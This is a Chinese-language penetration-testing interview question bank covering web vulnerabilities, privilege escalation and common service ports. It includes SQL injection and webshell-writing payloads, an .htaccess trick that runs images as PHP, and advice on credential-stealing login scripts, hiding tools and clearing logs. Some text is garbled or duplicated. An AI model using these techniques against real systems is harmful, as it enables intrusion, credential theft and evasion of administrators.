滲透測(cè)試面試題_第1頁(yè)
滲透測(cè)試面試題_第2頁(yè)
滲透測(cè)試面試題_第3頁(yè)
滲透測(cè)試面試題_第4頁(yè)
滲透測(cè)試面試題_第5頁(yè)
已閱讀5頁(yè),還剩37頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

知識(shí)大綱?思路流程?信息收集?漏洞挖掘?漏洞利用&權(quán)限提升?清除測(cè)試數(shù)據(jù)&輸出報(bào)告?復(fù)測(cè)?問題?深信服一面:?SQL注入防護(hù)?為什么參數(shù)化查詢可以防止 sql注入?SQL頭注入點(diǎn)?盲注是什么?怎么盲注??寬字節(jié)注入產(chǎn)生原理以及根本原因?產(chǎn)生原理?在哪里編碼?根本原因?解決辦法?sql里面只有update怎么利用?sql如何寫shell/單引號(hào)被過濾怎么辦?代替空格的方法?mysql的網(wǎng)站注入,5.0以上和5.0以下有什么區(qū)別??XSS?反射型?儲(chǔ)存型?DOM型?XSS原理?DOM型和反射型的區(qū)別?DOM型XSS自動(dòng)化測(cè)試或人工測(cè)試?如何快速發(fā)現(xiàn)xss位置?對(duì)于XSS怎么修補(bǔ)建議?XSS蠕蟲的產(chǎn)生條件?CSRF?CSRF原理?防御?token和referer做橫向?qū)Ρ?,誰(shuí)安全等級(jí)高??對(duì)referer的驗(yàn)證,從什么角度去做?如果做,怎么杜絕問題?針又token,對(duì)token測(cè)試會(huì)注意哪方面內(nèi)容,會(huì)對(duì)token的哪方面進(jìn)行測(cè)試??SSRF?檢測(cè)?SSRF漏洞的成因防御繞過?上傳?文件上傳漏洞原理?常見的上傳繞過方式?防護(hù)?審查上傳點(diǎn)的元素有什么意義??文件包含?原理?導(dǎo)致文件包含的函數(shù)?本地文件包含?XXE?邏輯漏洞?金融行業(yè)常見邏輯漏洞?溢出?中間人攻擊?原理:?防護(hù)?ARP欺騙?DDOS?syn洪流的原理?CC攻擊原理?Ddos原理?DDOS防護(hù)?提權(quán)?Mysql_UDF提權(quán)?Mysqlmof提權(quán)?mysql兩種提權(quán)方式?特殊漏洞?原理?利用?漏洞加固?防護(hù)?產(chǎn)生原因?利用條件和方法?修復(fù)?Struts2-045?Redis未授權(quán)訪問?Jenkins未授權(quán)訪問?MongoDB未授權(quán)訪問?Memcache未授權(quán)訪問?FFMPEG本地文件讀取漏洞?安全知識(shí)?簡(jiǎn)述路由器交換機(jī)、防火墻等網(wǎng)絡(luò)設(shè)備常用的幾個(gè)基礎(chǔ)配置加固項(xiàng),以及配置方法。?wireshark簡(jiǎn)單的過濾規(guī)則?TCP三次握手的過程以及對(duì)應(yīng)的狀態(tài)轉(zhuǎn)換?TCP和UDP協(xié)議區(qū)別?https的建立過程?AES/DES的具體工作步驟?RSA算法?分組密碼的加密模式?如何生成一個(gè)安全的隨機(jī)數(shù)??SSL握手過程?對(duì)稱加密與非對(duì)稱加密的不同,分別用在哪些方面?如何清理日志?入彳受Linux服務(wù)器后需要清除哪些日志??LINUX?Windows?查看當(dāng)前端口連接的命令有哪些? netstat和ss命令的區(qū)別和優(yōu)缺點(diǎn)?反彈shell的常用命令?一般常反彈哪一種 shell?為什么??通過Linux系統(tǒng)的/proc目錄,能夠獲取到哪些信息, 這些信息可以在安全上有哪些應(yīng)用??linux系統(tǒng)中,檢測(cè)哪些配置文件的配置項(xiàng),能夠提升 SSH的安全性。?如何一條命令查看文件內(nèi)容最后一百行?如何加固一個(gè)域環(huán)境下的 Windows桌面工作環(huán)境?請(qǐng)給出你的思路。?各種數(shù)據(jù)庫(kù)文件存放的位置?php中命令執(zhí)行涉及到的函數(shù)?安全模式下繞過 php的disablefuction?PHP弱類型?常用WEB開發(fā)JAVA框架?同源策略?Jsonp安全攻防技術(shù),怎么寫Jsonp的攻擊頁(yè)面??涉及到Jsonp的安全攻防內(nèi)容?攻擊頁(yè)面?WEB?PHP?數(shù)據(jù)庫(kù)?系統(tǒng)?密碼學(xué)?TCP/IP?流量分析?防火墻思路流程信息收集.服務(wù)器的相關(guān)信息(真實(shí)ip,系統(tǒng)類型,版本,開放端口, WAF等).網(wǎng)站指紋識(shí)別(包括, cms,cdn,證書等),dns記錄.whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫(kù),社工準(zhǔn)備等).子域名收集,旁站,C段等.googlehacking 針對(duì)化搜索,pdf文件,中間件版本,弱口令掃描等.掃描網(wǎng)站目錄結(jié)構(gòu),爆后臺(tái),網(wǎng)站banner,測(cè)試文件,備份等敏感文件泄漏等.傳輸協(xié)議,通用漏洞,exp,github源碼等漏洞挖掘.瀏覽網(wǎng)站,看看網(wǎng)站規(guī)模,功能,特點(diǎn)等.端口,弱口令,目錄等掃描,對(duì)響應(yīng)的端口進(jìn)行漏洞探測(cè),比如rsync,心臟出血,mysql,ftp,ssh 弱口令等。.XSS,SQL注入,上傳,命令注入, CSRF,cookie安全檢測(cè),敏感信息,通信數(shù)據(jù)傳輸,暴力破解,任意文件上傳,越權(quán)訪問,未授權(quán)訪問,目錄遍歷,文件 包含,重放攻擊(短信轟炸),服務(wù)器漏洞檢測(cè),最后使用漏掃工具等漏洞利用&權(quán)限提升?mysql提權(quán),serv-u提權(quán),oracle提權(quán)?windows 溢出提權(quán)?linux臟牛,內(nèi)核漏洞提權(quán)e清除測(cè)試數(shù)據(jù)&輸出報(bào)告i日志、測(cè)試數(shù)據(jù)的清理 ii總結(jié),輸出滲透測(cè)試報(bào)告,附修復(fù)方案復(fù)測(cè)驗(yàn)證并發(fā)現(xiàn)是否有新漏洞,輸出報(bào)告,歸檔問題1.拿到一個(gè)待檢測(cè)的站,你覺得應(yīng)該先做什么?1)信息收集.獲取域名的whois信息,獲取注冊(cè)者郵箱姓名電話等,丟社工庫(kù)里看看有沒有泄露密碼,然后嘗試用泄露的密碼進(jìn)行登錄后臺(tái)。用郵箱做關(guān)鍵詞進(jìn)行丟進(jìn)搜索引擎。利用搜索到的關(guān)聯(lián)信息找出其他郵箱進(jìn)而得到常用社交賬號(hào)。社工找出社交賬號(hào),里面或許會(huì)找出管理員設(shè)置密碼的習(xí)慣 。利用已有信息生成專用字典。.查詢服務(wù)器旁站以及子域名站點(diǎn), 因?yàn)橹髡疽话惚容^難, 所以先看看旁站有沒有通用性的cms或者其他漏洞。.查看服務(wù)器操作系統(tǒng)版本, web中間件,看看是否存在已知的漏洞,比如 IIS,APACHE,NGINX的解析漏洞.查看IP,進(jìn)行IP地址端口掃描,對(duì)響應(yīng)的端口進(jìn)行漏洞探測(cè), 比如rsync,心臟出血,mysql,ftp,ssh 弱口令等。.掃描網(wǎng)站目錄結(jié)構(gòu),看看是否可以遍歷目錄,或者敏感文件泄漏,比如 php探針.googlehack 進(jìn)一步探測(cè)網(wǎng)站的信息,后臺(tái),敏感文件2)漏洞掃描開始檢測(cè)漏洞,如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權(quán)訪問,目錄讀取,任意文件讀取,下載,文件包含, 遠(yuǎn)程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等3)漏洞利用利用以上的方式拿到 webshell,或者其他權(quán)限4)權(quán)限提升提權(quán)服務(wù)器,比如windows下mysql的udf提權(quán),serv-u提權(quán),windows低版本的漏洞,如iis6,pr,巴西烤肉,linux臟牛漏洞,linux內(nèi)核版本漏洞提權(quán),linux下的mysqlsystem提權(quán)以及oracle低權(quán)限提權(quán)5)日志清理6)總結(jié)報(bào)告及修復(fù)方案.判斷出網(wǎng)站的 CMS對(duì)滲透有什么意義?查找網(wǎng)上已曝光的程序漏洞。如果開源,還能下載相對(duì)應(yīng)的源碼進(jìn)行代碼審計(jì)。.一個(gè)成熟并且相對(duì)安全的 CMS,滲透時(shí)掃目錄的意義?敏感文件、二級(jí)目錄掃描站長(zhǎng)的誤操作比如:網(wǎng)站備份的壓縮文件、說明.txt、二級(jí)目錄可能存放著其他站點(diǎn).常見的網(wǎng)站服務(wù)器容器。IIS、Apache、nginx、Lighttpd、Tomcat.mysql注入點(diǎn),用工具對(duì)目標(biāo)站直接寫入一句話,需要哪些條件?root權(quán)限以及網(wǎng)站的絕對(duì)路徑。.目前已知哪些版本的容器有解析漏洞,具體舉例。IIS6.0/xx.asp/xx.jpg"xx.asp" 是文件夾名IIS7.0/7.5默認(rèn)Fast-CGI開啟,直接在url中圖片地址后面輸入 /1.php,會(huì)把正常圖片當(dāng)成php解析Nginx 版本小于等于0.8.37,利用方法和IIS7.0Z7,5一樣,F(xiàn)ast-CGI關(guān)閉情況下也可利用。 空字節(jié)代碼xxx.jpg.phpApache 上傳的文件命名為: test.php.x1.x2.x3,Apache是從右往左判斷后綴lighttpdxx.jpgZxx.php,不全,請(qǐng)小伙伴們?cè)谠u(píng)論處不吝補(bǔ)充,謝謝!.如何手工快速判斷目標(biāo)站是 windows還是linux服務(wù)器?linux大小寫敏感,windows大小寫不敏感。.為何一個(gè)mysql數(shù)據(jù)庫(kù)的站,只有一個(gè)80端口開放?更改了端口,沒有掃描出來(lái)。站庫(kù)分離。3306端口不對(duì)外開放9、3389無(wú)法連接的幾種情況沒開放3389端口端口被修改防護(hù)攔截處于內(nèi)網(wǎng)(需進(jìn)行端口轉(zhuǎn)發(fā)).如何突破注入時(shí)字符被轉(zhuǎn)義?寬字符注入hex編碼繞過.在某后臺(tái)新聞編輯界面看到編輯器,應(yīng)該先做什么?查看編輯器的名稱版本 ,然后搜索公開的漏洞.拿到一個(gè)webshell 發(fā)現(xiàn)網(wǎng)站根目錄下有 .htaccess文件,我們能做什么?能做的事情很多,用隱藏網(wǎng)馬來(lái)舉例子: 插入<FilesMatch"xxx.jpg">SetHandlerapplication/x-httpd-php .jpg文件會(huì)被解析成.php文件。具體其他的事情,不好詳說,建議大家自己去搜索語(yǔ)句來(lái)玩玩。.注入漏洞只能查賬號(hào)密碼?只要權(quán)限廣,拖庫(kù)脫到老。.安全狗會(huì)追蹤變量,從而發(fā)現(xiàn)出是一句話木馬嗎?是根據(jù)特征碼,所以很好繞過了,只要思路寬,繞狗繞到歡,但這應(yīng)該不會(huì)是一成不變的。**15.access 掃出后綴為asp的數(shù)據(jù)庫(kù)文件,訪問亂碼, **如何實(shí)現(xiàn)到本地利用?迅雷下載,直接改后綴為 .mdbo.提權(quán)時(shí)選擇可讀寫目錄,為何盡量不用帶空格的目錄?因?yàn)閑xp執(zhí)行多半需要空格界定參數(shù).某服務(wù)器有站點(diǎn)A,B為何在A的后臺(tái)添加test用戶,訪問B的后臺(tái)。發(fā)現(xiàn)也添加上了test用戶?同數(shù)據(jù)庫(kù)。.注入時(shí)可以不使用 and或or或xor,直接orderby開始注入嗎?and/or/xor,前面的1=1、1=2步驟只是為了判斷是否為注入點(diǎn), 如果已經(jīng)確定是注入點(diǎn)那就可以省那步驟去。19:某個(gè)防注入系統(tǒng),在注入時(shí)會(huì)提示:

系統(tǒng)檢測(cè)到你有非法注入的行為。已記錄您的ipxx.xx.xx.xx時(shí)間系統(tǒng)檢測(cè)到你有非法注入的行為。已記錄您的ipxx.xx.xx.xx時(shí)間:2016:01-23提交頁(yè)面:test.asp?id=15 提交內(nèi)容:and1=120、如何利用這個(gè)防注入系統(tǒng)拿 shell?在URL里面直接提交一句話,這樣網(wǎng)站就把你的一句話也記錄進(jìn)數(shù)據(jù)庫(kù)文件了 這個(gè)時(shí)候可以嘗試尋找網(wǎng)站的配置文件 直接上菜刀鏈接。.上傳大馬后訪問亂碼時(shí),有哪些解決辦法?瀏覽器中改編碼。.審查上傳點(diǎn)的元素有什么意義?有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的,這時(shí)只要增加上傳類型就能突破限制了。.目標(biāo)站禁止注冊(cè)用戶, 找回密碼處隨便輸入用戶名提示: “此用戶不存在”,你覺得這里怎樣利用?先爆破用戶名,再利用被爆破出來(lái)的用戶名爆破密碼。其實(shí)有些站點(diǎn),在登陸處也會(huì)這樣提示所有和數(shù)據(jù)庫(kù)有交互的地方都有可能有注入。.目標(biāo)站發(fā)現(xiàn)某txt的下載地址為/down/down.php?file=/upwdown/1.txt ,你有什么,黑路?這就是傳說中的下載漏洞!在file=后面嘗試輸入index.php 下載他的首頁(yè)文件,然后在首頁(yè)文件里繼續(xù)查找其他網(wǎng)站的配置文件,可以找出網(wǎng)站的數(shù)據(jù)庫(kù)密碼和數(shù)據(jù)庫(kù)的地址。.甲給你一個(gè)目標(biāo)站,并且告訴你根目錄下存在 /abc/目錄,并且此目錄下存在編輯器和admin目錄。請(qǐng)問你的想法是?直接在網(wǎng)站二級(jí)目錄 /abc/下掃描敏感文件及目錄。.在有shell的情況下,如何使用 xss實(shí)現(xiàn)對(duì)目標(biāo)站的長(zhǎng)久控制?后臺(tái)登錄處加一段記錄登錄賬號(hào)密碼的 js,并且判斷是否登錄成功,如果登錄成功,就把賬號(hào)密碼記錄到一個(gè)生僻的路徑的文件中或者直接發(fā)到自己的網(wǎng)站文件中。 (此方法適合有價(jià)值并且需要深入控制權(quán)限的網(wǎng)絡(luò))。在登錄后才可以訪問的文件中插入XSS腳本。.后臺(tái)修改管理員密碼處,原密碼顯示為 *。你覺得該怎樣實(shí)現(xiàn)讀出這個(gè)用戶的密碼?審查元素把密碼處的password屬性改成text就明文顯示了.目標(biāo)站無(wú)防護(hù),上傳圖片可以正常訪問,上傳腳本格式訪問則 403.什么原因?原因很多,有可能web服務(wù)器配置把上傳目錄寫死了不執(zhí)行相應(yīng)腳本, 嘗試改后綴名繞過.審查元素得知網(wǎng)站所使用的防護(hù)軟件,你覺得怎樣做到的?在敏感操作被攔截,通過界面信息無(wú)法具體判斷是什么防護(hù)的時(shí)候, F12看HTML體部比如護(hù)衛(wèi)神就可以在名稱那看到內(nèi)容。.在win2003服務(wù)器中建立一個(gè) .zhongzi文件夾用意何為?隱藏文件夾,為了不讓管理員發(fā)現(xiàn)你傳上去的工具。31、sql注入有以下兩個(gè)測(cè)試選項(xiàng),選一個(gè)并且闡述不選另一個(gè)的理由:A.demo.jsp?id=2+1B.demo.jsp?id=2-1 選B,在URL編碼中+代表空格,可能會(huì)造成混淆32、以下鏈接存在sql注入漏洞,對(duì)于這個(gè)變形注入,你有什么思路?demo.do?DATA=AjAxNg==DATA 有可能經(jīng)過了 base64編碼再傳入服務(wù)器,所以我們也要對(duì)參數(shù)進(jìn)行 base64編碼才能正確完成測(cè)試33、發(fā)現(xiàn)demo.jsp?uid=110 注入點(diǎn),你有哪幾種思路獲取 webshell,哪種是優(yōu)選?有寫入權(quán)限的,構(gòu)造聯(lián)合查詢語(yǔ)句使用 usingINTOOUTFILE,可以將查詢的輸出重定向到系統(tǒng)的文件中,這樣去寫入 WebShell使用sqlmap-os-shell原理和上面一種相同,來(lái)直接獲得一個(gè) Shell,這樣效率更高通過構(gòu)造聯(lián)合查詢語(yǔ)句得到網(wǎng)站管理員的賬戶和密碼,然后掃后臺(tái)登錄后臺(tái),再在后臺(tái)通過改包上傳等方法上傳 Shell34、CSRF和XSS和XXE有什么區(qū)別,以及修復(fù)方式?XSS是跨站腳本攻擊,用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來(lái)執(zhí)行,從而實(shí)現(xiàn)竊取用戶信息等攻擊。修復(fù)方式:對(duì)字符實(shí)體進(jìn)行轉(zhuǎn)義、使用HTTPOnly來(lái)禁止JavaScript讀取Cookie值、輸入時(shí)校驗(yàn)、瀏覽器與Web應(yīng)用端采用相同的字符編碼。CSRF是跨站請(qǐng)求偽造攻擊,XSS是實(shí)現(xiàn)CSRF的諸多手段中的一種,是由于沒有在關(guān)鍵操作執(zhí)行時(shí)進(jìn)行是否由用戶自愿發(fā)起的確認(rèn)。修復(fù)方式:篩選出需要防范 CSRF的頁(yè)面然后嵌入Token、再次輸入密碼、檢驗(yàn)RefererXXE是XML外部實(shí)體注入攻擊, XML中可以通過調(diào)用實(shí)體來(lái)請(qǐng)求本地或者遠(yuǎn)程內(nèi)容,和遠(yuǎn)程文件保護(hù)類似,會(huì)引發(fā)相關(guān)安全問題,例如敏感文件讀取。 修復(fù)方式:XML解析庫(kù)在調(diào)用時(shí)嚴(yán)格禁止對(duì)外部實(shí)體的解析。35、CSRF、SSRF和重放攻擊有什么區(qū)別?CSRF是跨站請(qǐng)求偽造攻擊,由客戶端發(fā)起 SSRF是服務(wù)器端請(qǐng)求偽造,由服務(wù)器發(fā)起重放攻擊是將截獲的數(shù)據(jù)包進(jìn)行重放,達(dá)到身份認(rèn)證等目的36、說出至少三種業(yè)務(wù)邏輯漏洞,以及修復(fù)方式?密碼找回漏洞中存在)密碼允許暴力破解、2)存在通用型找回憑證、3)可以跳過驗(yàn)證步驟、4)找回憑證可以攔包獲取等方式來(lái)通過廠商提供的密碼找回功能來(lái)得到密碼。 身份認(rèn)證漏洞中最常見的是1)會(huì)話固定攻擊)Cookie仿冒只要得到Session或Cookie即可偽造用戶身份。 驗(yàn)證碼漏洞中存在1)驗(yàn)證碼允許暴力破解2)驗(yàn)證碼可以通過 Javascript 或者改包的方法來(lái)進(jìn)行繞過37、圈出下面會(huì)話中可能存在問題的項(xiàng),并標(biāo)注可能會(huì)存在的問題?get/ecskins/demo.jsp?uid=2016031900&keyword= "helloworldHTTP/1.1Host:.com:82User-Agent:Mozilla/ 5.0Firefox/40Accept:text/css,/;q=0.1 Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3 Referer:http://****.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;st_uid=N90PLYHLZGJXI-NX01VPUF46W;status=TrueConnection:keep-alive有寫入權(quán)限的,構(gòu)造聯(lián)合查詢語(yǔ)句使用 usingINTOOUTFILE,可以將查詢的輸出重定向到系統(tǒng)的文件中,這樣去寫入 WebShell使用sqlmap -os-shell原理和上面一種相同,來(lái)直接獲得一個(gè) Shell,這樣效率更高 通過構(gòu)造聯(lián)合查詢語(yǔ)句得到網(wǎng)站管理員的賬戶和密碼,然后掃后臺(tái)登錄后臺(tái),再在后臺(tái)通過改包上傳等方法上傳 Shell

38、給你一個(gè)網(wǎng)站你是如何來(lái)滲透測(cè)試的38、給你一個(gè)網(wǎng)站你是如何來(lái)滲透測(cè)試的?在獲取書面授權(quán)的前提下39、sqlmap,怎么對(duì)一個(gè)注入點(diǎn)注入? 1)如果是get型號(hào),直接,sqlmap-u" 諸如點(diǎn)網(wǎng)址”.2)如果是post型諸如點(diǎn),可以sqlmap-u"注入點(diǎn)網(wǎng)址”--data="post 的參數(shù)"3)如果是cookie,X-Forwarded-For等,可以訪問的時(shí)候,用burpsuite抓包,注入處用號(hào)替換,放到文件里,然后sqlmap-r" 文件地址"40、nmap,掃描的幾種方式41、sql注入的幾種類型? 1)報(bào)錯(cuò)注入 2)bool型注入3)延時(shí)注入 4)寬字節(jié)注入42、報(bào)錯(cuò)注入的函數(shù)有哪些? 10個(gè)1)andextractvalue(1,concat(0x7e,(select@@version),0x7e))】】】 2)通過floor報(bào)錯(cuò)向下取整 3)+andupdatexml(1,concat(0x7e,(secect@@version),0x7e),1) 4).geometrycollection()selectfromtestwhereid=1andgeometrycollection((select from(selectfrom(selectuser())a)b));5 ).multipoint()selectfromtestwhereid=1andmultipoint((selectfrom(selectfrom(selectuser())a)b));6 ).polygon()selectfromtestwhereid=1andpolygon((selectfrom(selectfrom(selectuser())a)b)); 7).multipolygon()selectfromtestwhereid=1andmultipolygon((selectfrom(selectfrom(selectuser())a)b)); 8).linestring()selectfromtestwhereid=1andlinestring((selectfrom(selectfrom(selectuser())a)b)); 9).multilinestring()selectfromtestwhereid=1andmultilinestring((select from(selectfrom(selectuser())a)b));10).exp()selectfromtestwhereid=1andexp(?(select*from(selectuser())a));43、延時(shí)注入如何來(lái)判斷? if(ascii(substr(hello",1,1))=104,sleep(5),1)44、盲注和延時(shí)注入的共同點(diǎn)? 都是一個(gè)字符一個(gè)字符的判斷45、如何拿一個(gè)網(wǎng)站的 webshell?上傳,后臺(tái)編輯模板,sql注入寫文件,命令執(zhí)行,代碼執(zhí)行, 一些已經(jīng)爆出的cms漏洞,比如dedecms 后臺(tái)可以直接建立腳本文件,wordpress 上傳插件包含腳本文件 zip壓縮包等46、sql注入寫文件都有哪些函數(shù)? select'一句話'intooutfile'路徑'select'一句話'intodumpfile'路徑'select''intodumpfile'd:\wwwroot\\nvhack.php';47、如何防止CSRF?1,驗(yàn)證referer2,驗(yàn)證token詳細(xì):/topic/5533dd6e9138f09b629674fd48、owasp 漏洞都有哪些? 1、SQL注入防護(hù)方法:2、失效的身份認(rèn)證和會(huì)話管理3、跨站腳本攻擊XSS4、直接引用不安全的對(duì)象 5、安全配置錯(cuò)誤6、敏感信息泄露7、缺少功能級(jí)的訪問控制 8、跨站請(qǐng)求偽造CSRF9、使用含有已知漏洞的組件10、未驗(yàn)證的重定向和轉(zhuǎn)發(fā)49、SQL注入防護(hù)方法?1、使用安全的API2、對(duì)輸入的特殊字符進(jìn)行 Escape轉(zhuǎn)義處理3、使用白名單來(lái)規(guī)范化輸入驗(yàn)證方法 4、對(duì)客戶端輸入進(jìn)行控制,不允許輸入SQL注入相關(guān)的特殊字符 5、服務(wù)器端在提交數(shù)據(jù)庫(kù)進(jìn)行 SQL查詢之前,對(duì)特殊字符進(jìn)行過濾、轉(zhuǎn)義、替換、刪除。50、代碼執(zhí)行,文件讀取,命令執(zhí)行的函數(shù)都有哪些?1)代碼執(zhí)行:eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function2)文件讀?。篺ile_get_contents(),highlight_file(),fopen(),readfile(),fread(),fgetss(),fgets(),parse_ini_file(),show_source(),file() 等3)命令執(zhí)行:system。,exec(),shell_exec(),passthru(),pcntl_exec(),popen(),proc_open()51、img標(biāo)簽除了onerror 屬性外,還有其他獲取管理員路徑的辦法嗎? src指定一個(gè)遠(yuǎn)程的腳本文件,獲取referer52、img標(biāo)簽除了onerror屬性外,并且src屬性的后綴名,必須以.jpg結(jié)尾,怎么獲取管理員路徑。1)遠(yuǎn)程服務(wù)器修改apache配置文件,配置.jpg文件以php方式來(lái)解析AddTypeapplication/x-httpd-php.jpg<imgsrc=http:〃xss.tv/1.jpg> 會(huì)以php方式來(lái)解析53、為什么aspx木馬權(quán)限比asp大?aspx使用的是.net技術(shù)。IIS中默認(rèn)不支持, ASP只是腳本語(yǔ)言而已。入侵的時(shí)候asp的木馬一般是guest權(quán)限???APSX的木馬一般是users權(quán)限。54、如何繞過waf??大小寫轉(zhuǎn)換法?干擾字符/*!*/?編碼base64Unicodehexurlascll?復(fù)參數(shù)55、如何向服務(wù)器寫入 webshell??各種上傳漏洞?mysql具有寫入權(quán)限,用sql語(yǔ)句寫入shell?httpput方法56、滲透測(cè)試中常見的端口1,web類(web漏洞/敏感目錄)第三方通用組件漏洞 strutsthinkphpjbossgangliazabbix80web80-89web8000-9090web2,數(shù)據(jù)庫(kù)類(掃描弱口令)1433MSSQL1521Oracle

3306MySQL5432PostgreSQL3,特殊服務(wù)類(未授權(quán)/命令執(zhí)行類/漏洞)443SSL心臟滴血873Rsync未授權(quán)5984CouchDBhttp://xxx:5984/_utils/6379redis未授權(quán)7001,7002WebLogic默認(rèn)弱口令,反序列9200,9300elasticsearch參考WooYun:多玩某服務(wù)器ElasticSearch 命令執(zhí)行漏洞11211memcache未授權(quán)訪問27017,27018Mongodb 未授權(quán)訪問50000SAP命令執(zhí)行50070,50030hadoop 默認(rèn)端口未授權(quán)訪問4,常用端口類(掃描弱口令/端口爆破)ftpSSHTelnet2601,2604zebra路由,默認(rèn)密碼zebra3389遠(yuǎn)程桌面端口合計(jì)詳情ftpSSHTelnetweb80-89web161SNMP389LDAP443SSL心臟滴血以及一些web漏洞測(cè)試445SMB512,513,514Rexec873Rsync未授權(quán)1025,111NFS1433MSSQL1521Oracle:(iSqlPlusPort:5560,7778)2082/2083cpanel主機(jī)管理系統(tǒng)登陸 (國(guó)外用較多)2222DA虛擬主機(jī)管理系統(tǒng)登陸 (國(guó)外用較多)2601,2604zebra路由,默認(rèn)密碼zebra3128squid 代理默認(rèn)端口,如果沒設(shè)置口令很可能就直接漫游內(nèi)網(wǎng)了3306MySQL3312/3311kangle主機(jī)管理系統(tǒng)登陸3389遠(yuǎn)程桌面4440rundeck參考WooYun:借用新浪某服務(wù)成功漫游新浪內(nèi)網(wǎng)5432PostgreSQL5900vnc

5984CouchDBhttp://xxx:5984/_utils/6082varnish參考WooYun:VarnishHTTPacceleratorCLI 未授權(quán)訪問易導(dǎo)致網(wǎng)站被直接篡改或者作為代理進(jìn)入內(nèi)網(wǎng)6379redis未授權(quán)7001,7002WebLogic默認(rèn)弱口令,反序列7778Kloxo 主機(jī)控制面板登錄8000-9090 都是一些常見的web端口,有些運(yùn)維喜歡把管理后臺(tái)開在這些非 80的端口上8080tomcat/WDCP主機(jī)管理系統(tǒng),默認(rèn)弱口令8080,8089,9090JBOSS8083Vestacp 主機(jī)管理系統(tǒng) (國(guó)外用較多)8649ganglia8888amh/LuManager 主機(jī)管理系統(tǒng)默認(rèn)端口9200,9300elasticsearch參考WooYun:多玩某服務(wù)器日asticSearch 命令執(zhí)行漏洞10000Virtualmin/Webmin 服務(wù)器虛擬主機(jī)管理系統(tǒng)11211memcache未授權(quán)訪問27017,27018Mongodb未授權(quán)訪問28017mongodb統(tǒng)計(jì)頁(yè)面50000SAP命令執(zhí)行50070,50030hadoop 默認(rèn)端口未授權(quán)訪問深信服一面:?了解哪些漏洞?文件上傳有哪些防護(hù)方式?用什么掃描端口,目錄?如何判斷注入?注入有防護(hù)怎么辦?有沒有寫過tamper?330614438080 是什么端口?計(jì)算機(jī)網(wǎng)絡(luò)從物理層到應(yīng)用層 xxxx?有沒有web服務(wù)開發(fā)經(jīng)驗(yàn)?如何向服務(wù)器寫入 webshell?有沒有用過xss平臺(tái)?網(wǎng)站滲透的流程?mysql兩種提權(quán)方式(udf,?)

?常見加密方式xxx?ddos如何防護(hù)?有沒有抓過包,會(huì)不會(huì)寫 wireshark過濾規(guī)則?清理日志要清理哪些SQL注入防護(hù)1、使用安全的API2、對(duì)輸入的特殊字符進(jìn)行 Escape轉(zhuǎn)義處理3、使用白名單來(lái)規(guī)范化輸入驗(yàn)證方法4、對(duì)客戶端輸入進(jìn)行控制, 不允許輸入SQL注入相關(guān)的特殊字符 5、服務(wù)器端在提交數(shù)據(jù)庫(kù)進(jìn)行 SQL查詢之前,對(duì)特殊字符進(jìn)行過濾、轉(zhuǎn)義、替換、刪除。\6.規(guī)范編碼,字符集為什么參數(shù)化查詢可以防止 sql注入原理:使用參數(shù)化查詢數(shù)據(jù)庫(kù)服務(wù)器不會(huì)把參數(shù)的內(nèi)容當(dāng)作 sql指令的一部分來(lái)執(zhí)行,是在數(shù)據(jù)庫(kù)完成sql指令的編譯后才套用參數(shù)運(yùn)行簡(jiǎn)單的說:參數(shù)化能防注入的原因在于 ,語(yǔ)句是語(yǔ)句,參數(shù)是參數(shù),參數(shù)的值并不是語(yǔ)句的一部分,數(shù)據(jù)庫(kù)只按語(yǔ)句的語(yǔ)義跑SQL頭注入點(diǎn)UAREFERERCOOKIEIP肓注是什么?怎么肓注?盲注是在SQL注入攻擊過程中, 服務(wù)器關(guān)閉了錯(cuò)誤回顯, 我們單純通過服務(wù)器返回內(nèi)容的變化來(lái)判斷是否存在 SQL注入和利用的方式。 盲注的手段有兩種, 一個(gè)是通過頁(yè)面的返回內(nèi)容是否正確(boolean-based),來(lái)驗(yàn)證是否存在注入。一個(gè)是通過 sql語(yǔ)句處理時(shí)間的不同來(lái)判斷是否存在注入 (time-based),在這里,可以用benchmark,sleep等造成延時(shí)效果的函數(shù),也可以通過構(gòu)造大笛卡兒積的聯(lián)合查詢表來(lái)達(dá)到延時(shí)的目的。寬字節(jié)注入產(chǎn)生原理以及根本原因產(chǎn)生原理在數(shù)據(jù)庫(kù)使用了寬字符集而 WEB中沒考慮這個(gè)問題的情況下, 在WEB層,由于0XBF27是兩個(gè)字符,在PHP中比如addslash和magic_quotes_gpc 開啟時(shí),由于會(huì)對(duì)0x27單引號(hào)進(jìn)行轉(zhuǎn)義, 因此0xbf27會(huì)變成0xbf5c27,而數(shù)據(jù)進(jìn)入數(shù)據(jù)庫(kù)中時(shí), 由于0XBF5c是一個(gè)另外的字符,因此 轉(zhuǎn)義符號(hào)會(huì)被前面的 bf帶著“吃掉”,單引號(hào)由此逃逸出來(lái)可以用來(lái)閉合語(yǔ)句。在哪里編碼根本原因character_set_client( 客戶端的字符集)和character_set_connection( 連接層的字符集)不同,或轉(zhuǎn)換函數(shù)如, iconv、mb_convert_encoding 使用不當(dāng)。解決辦法統(tǒng)一數(shù)據(jù)庫(kù)、 Web應(yīng)用、操作系統(tǒng)所使用的字符集,避免解析產(chǎn)生差異,最好都設(shè)置為UTF-80或?qū)?shù)據(jù)進(jìn)行正確的轉(zhuǎn)義, 如mysql_real_escape_string+mysql_set_charset的使用。sql里面只有update怎么利用先理解這句SQL

